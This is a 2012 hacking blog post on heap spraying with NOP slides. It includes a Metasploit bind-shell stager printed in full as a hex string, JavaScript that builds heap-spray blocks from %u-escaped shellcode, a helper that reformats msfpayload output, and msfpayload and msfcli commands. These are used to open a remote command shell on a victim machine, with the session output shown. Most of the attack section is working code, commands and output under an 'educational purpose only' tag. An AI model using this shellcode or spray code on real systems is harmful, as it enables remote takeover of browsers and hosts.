Tuesday, 24 July 2012

Heap hacking

HEAP SPRAYING USING NOPS & IMMUNITY DEBUGGER

HI GUYS, SEEKER HERE. TODAY, AFTER A FEW DAYS OF STUDY AND RESEARCH, I CAME UP WITH THIS NEW HACKING TRICK..


HEAP HACKING USING IMMUNITY DEBUGGER

What is this attack all about??

In this post we will use Immunity Debugger to watch a NOP slide and the shellcode behind it execute. People who are new to the hacking world might not know what a NOP or Immunity Debugger is, so I will give a brief introduction to both of them...

What is NOP?

No-operation instruction (NOP) and NOP slide. A NOP is an assembly instruction that says, "Do nothing and move to the next instruction." A NOP slide (also called a NOP sled) is a run of NOPs adjacent to each other in memory, basically taking up space. If a program's execution flow lands anywhere in a series of NOP instructions, it will linearly "slide" down to the end of them and into the next instruction. On the Intel x86 architecture a NOP has the one-byte opcode 0x90, commonly seen in exploit code as \x90.

What is the use of NOP in heap spraying technique?

Heap spraying fills the heap with many copies of a known pattern, a long NOP slide followed by your shellcode, repeated until the pattern occupies a large and predictable part of the process's address space. You'll recall that memory in the heap is dynamically allocated at program runtime; in a browser this is usually done from JavaScript, by building large strings and keeping references to them, which makes the browser's allocated memory grow significantly. Spraying does not control execution by itself. It is paired with a separate bug (a corrupted pointer, a use-after-free, an overflow) that sends execution to some address the attacker cannot choose precisely. Because the sprayed region is almost entirely NOPs, a jump into it has a good chance of hitting a slide and then running the shellcode; had it landed in the middle of the shellcode instead, the CPU would decode from mid-instruction and most likely crash. In this post the shellcode is a bind shell, so once it runs the victim listens on a port and we connect to it to get a command shell. One caveat: the technique as described needs the heap to be executable. With DEP enforced on the heap, a spray can still place data (for example a ROP chain) at a predictable address, but the NOPs there will not execute.

What does the NOP slide look like in the shellcode?

In the hex dump in the walkthrough below you can see the byte 90 repeated at the start: 90 is the Intel x86 opcode for NOP, written \x90 in exploit code. That run of \x90s creates the NOP-slide effect. The bytes after it are the payload, such as a reverse shell or a Meterpreter stager.
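The block a spray allocates, as an added example that is not part of the original post and not Metasploit's or Immunity's code. It uses the %u-escape idiom that browser exploits of the time used to lay NOPs and shellcode into a JavaScript string, and it checks the "good chance of hitting a NOP slide" claim from the section above. STAGE1_HEX is a constructed input, just the first 12 bytes of the stager dump in the walkthrough below; the block and spray sizes are arbitrary, and Node's Buffer is used only to inspect the bytes (nothing a browser would need).

```javascript
// Added example (not from the post): layout of one heap-spray block and a check of
// where a random jump into it would land. STAGE1_HEX is CONSTRUCTED: only the first
// 12 bytes of the bind_tcp stager; a real spray uses the whole stage-1 blob.
const STAGE1_HEX = 'fce8890000006089e531d264';

// A JavaScript string sits in memory as UTF-16LE code units, so every %uXXXX escape
// places two bytes, low byte first: bytes "fc e8" must be written as %ue8fc.
function hexToUnicodeEscapes(hex) {
  if (hex.length % 2 !== 0) throw new Error('hex must contain whole bytes');
  if ((hex.length / 2) % 2 !== 0) hex = '90' + hex; // odd byte count: one extra NOP in front
  let out = '';
  for (let i = 0; i < hex.length; i += 4) {
    out += '%u' + hex.slice(i + 2, i + 4) + hex.slice(i, i + 2);
  }
  return out;
}

// One spray block: a NOP slide that fills blockBytes, with the shellcode at the very end.
// The slide is grown by doubling (the usual idiom) and then trimmed to size.
function buildSprayBlock(shellcodeHex, blockBytes) {
  const shellcode = unescape(hexToUnicodeEscapes(shellcodeHex));
  const units = blockBytes / 2;                    // UTF-16 code units per block
  if (shellcode.length > units) throw new Error('shellcode larger than block');
  let slide = unescape('%u9090');                  // two NOP bytes per code unit
  while (slide.length < units) slide += slide;
  slide = slide.slice(0, units - shellcode.length);
  return slide + shellcode;
}

// Allocate many copies so the blocks cover a large, predictable address range.
// substring() forced a fresh copy in the engines of the day; modern engines may alias.
function spray(block, count) {
  const heap = [];
  for (let i = 0; i < count; i++) heap.push(block.substring(0, block.length));
  return heap;
}

// Raw bytes of a block as they would sit in memory (inspection only).
function bytesOf(block) {
  return Buffer.from(block, 'utf16le');
}

// What happens if a corrupted pointer sends execution to `offset` inside a block?
// In the slide: execution slides down to the shellcode's first byte (success).
// In the shellcode: entry mid-instruction, almost certainly a crash.
function landing(block, shellcodeHex, offset) {
  const bytes = bytesOf(block);
  const shellcodeStart = bytes.length - shellcodeHex.length / 2;
  if (offset < 0 || offset >= bytes.length) return 'outside';
  if (offset < shellcodeStart) {
    if (bytes[offset] !== 0x90) throw new Error('slide is not all NOPs');
    return 'slide';
  }
  return 'shellcode';
}

// Fraction of each block that is slide. With a 1 MiB block and a ~300-byte stager
// this is over 99.9%, which is why "jump anywhere in the spray" works.
function slideHitProbability(block, shellcodeHex) {
  const total = block.length * 2;
  return (total - shellcodeHex.length / 2) / total;
}

function demo() {
  const block = buildSprayBlock(STAGE1_HEX, 0x100000); // 1 MiB blocks, as exploits of the era used
  const heap = spray(block, 50);                        // ~50 MiB of slide + stager
  console.log('blocks:', heap.length, 'bytes each:', block.length * 2);
  console.log('P(land in slide) =', slideHitProbability(block, STAGE1_HEX).toFixed(6));
  console.log('offset 0x1234 ->', landing(block, STAGE1_HEX, 0x1234));
}
demo();
```

Two things the numbers do not show: the probability above is only the chance of landing in a slide once execution reaches the sprayed region, so the spray still has to be large enough to cover the address the bug jumps to; and byte pairs whose high byte is d8 to df form UTF-16 surrogate code units, which some engines rewrite, so such bytes in a stager need to be checked in the debugger exactly as the walkthrough below does.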

What is IMMUNITY DEBUGGER?

To follow the NOP slide we will use Immunity Debugger, but before doing that you should know what Immunity Debugger is. It is a Windows user-mode debugger built on the OllyDbg interface and aimed at exploit development, malware analysis and reverse engineering; on top of the usual disassembly, breakpoints and memory views it adds function graphing, heap analysis tools and a Python API for scripting the debugger. On your Windows XP target, download and install it from http://www.immunityinc.com/.

LET'S START THE HACKING!!!!

1. seeker@bt# msfpayload windows/shell/bind_tcp LPORT=443 C
//// use msfpayload to generate sample shellcode for a simple TCP bind shell listening on port 443, in C output format. Because this is a staged payload, the command prints two blobs: stage 1 (the small stager that binds the port and receives the rest) and stage 2 (the shell itself). Here we are concerned only with the stage 1 shellcode, because Metasploit's handler sends stage 2 over the connection once we connect to it ////
2. Copy and paste the stage 1 shellcode into a text editor. You'll need to do some editing before proceeding. Now that you have your basic shellcode, add as many NOPs as you want to the beginning of it (such as \x90\x90\x90\x90\x90). Then remove all the \x occurrences, together with the quotes and line breaks of the C array, so that only a plain hex string is left, similar to the one below.
 
909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090fce8890000006089e531d2648b52308b520c8b52148b72280fb74a2631ff31c0ac3c617c022c20c1cf0d01c7e2f052578b52108b423c01d08b407885c0744a01d0508b48188b582001d3e33c498b348b01d631ff31c0acc1cf0d01c738e075f4037df83b7d2475e2588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe0585f5a8b12eb865d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd5505050504050405068ea0fdfe0ffd59731db5368020001bb89e66a10565768c2db3767ffd5535768b7e938ffffd55353576874ec3be1ffd5579768756e4d61ffd56a006a0456576802d9c85fffd58b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd501c329c685f675ecc3
3. Now, on your victim machine, start Immunity Debugger and open an executable. Since the real-world version of this attack targets the browser, we will use iexplore.exe:
FILE -> OPEN -> and the path where your iexplore.exe is
4. You should see a number of assembly instructions in the main window, with the debugger paused at the program's entry point. Left-click the first instruction on the screen, and hold down SHIFT while left-clicking further down to highlight a range of instructions. Highlight at least as many bytes as the shellcode has: Binary paste only overwrites the selected bytes.
5. Copy the hex string from the text file you prepared from the msfpayload output, right-click in the Immunity Debugger window and choose Binary -> Binary paste. This writes the bytes into the selected range of the process's memory (the file on disk is untouched), and the disassembly now shows a run of NOP instructions followed by the stager's instructions.
 

6. When we exported the shellcode in bind_tcp format, stage 1 ended with the bytes ecc3 (the stager's closing jnz and ret). Locate the last instruction we pasted, the one ending in ecc3. Right after the ecc3, press F2 to set a breakpoint, and press F2 again on the first NOP at the start of our shellcode to set a second one.

7. Open up a command prompt on the victim and type netstat -an. Nothing should be listening on port 443 yet, which confirms that the payload has not executed.

8. seeker@bt3# msfcli multi/handler PAYLOAD=windows/shell/bind_tcp RHOST=192.168.57.82 LPORT=443 E

/// this starts Metasploit's handler. Because the payload is a bind shell, the handler does not listen: it connects to the victim (RHOST) on port 443, where the stage 1 code is listening, and sends stage 2 over that connection ///



9. Now press F9 (Run) in Immunity Debugger; if it pauses at one of our breakpoints, press F9 again. Execution slides down the NOPs into the stager, which binds port 443 and waits, so netstat -an on the victim now shows 0.0.0.0:443 in the LISTENING state. As soon as the handler connects and sends stage 2, bingo, we get a command shell on the victim:


msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started bind handler
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.57.73:60463 -> 192.168.57.82:443)
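Step 2 above is tedious and error-prone by hand for a stager of a few hundred bytes, so here is an added example that does it from msfpayload's C output. It is not part of the original post and not a Metasploit tool. SAMPLE_C_OUTPUT is constructed to resemble the two-stage C output (a comment header giving the byte count and stage number, then a C byte array); the byte strings in it are made up and short, not the real stager, and the header layout it keys on is an assumption about msfpayload's format.

```javascript
// Added example (not from the post): turn msfpayload's C-format output into the bare
// hex string Immunity Debugger's Binary paste expects, keeping only stage 1 and
// prepending a NOP slide. SAMPLE_C_OUTPUT is CONSTRUCTED to look like that output;
// its bytes are made up and its header layout is an assumption.
const SAMPLE_C_OUTPUT = `
/*
 * windows/shell/bind_tcp - 15 bytes (stage 1)
 * http://www.metasploit.com
 * LPORT=443, EXITFUNC=process
 */
unsigned char buf[] =
"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52"
"\\xc3";
/*
 * windows/shell/bind_tcp - 4 bytes (stage 2)
 */
unsigned char buf[] =
"\\xde\\xad\\xbe\\xef";
`;

// Split the output on its "N bytes (stage N)" headers and collect each stage's \xHH
// bytes. The byte count found is checked against the count the header declares, which
// catches a truncated copy-paste before it reaches the debugger.
function parseMsfpayloadC(text) {
  const headerRe = /(\d+) bytes \(stage (\d+)\)/g;
  const headers = [];
  let m;
  while ((m = headerRe.exec(text)) !== null) {
    headers.push({ index: m.index, declared: Number(m[1]), stage: Number(m[2]) });
  }
  const stages = {};
  headers.forEach((h, i) => {
    const end = i + 1 < headers.length ? headers[i + 1].index : text.length;
    const body = text.slice(h.index, end);
    const hex = (body.match(/\\x([0-9a-fA-F]{2})/g) || [])
      .map(s => s.slice(2).toLowerCase())
      .join('');
    if (hex.length / 2 !== h.declared) {
      throw new Error(`stage ${h.stage}: header says ${h.declared} bytes, found ${hex.length / 2}`);
    }
    stages[h.stage] = hex;
  });
  return stages;
}

// Stage 1 only, with nopCount NOPs (0x90) in front, as a plain hex string.
function preparePaste(cOutput, nopCount) {
  const stage1 = parseMsfpayloadC(cOutput)[1];
  if (!stage1) throw new Error('no stage 1 found in msfpayload output');
  return '90'.repeat(nopCount) + stage1;
}

console.log(preparePaste(SAMPLE_C_OUTPUT, 8));
```

The output is what goes on the clipboard for Binary paste; the last four hex digits of the real stager should read ecc3, which is the marker step 6 uses for the breakpoint.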



/////EDUCATIONAL PURPOSE ONLY////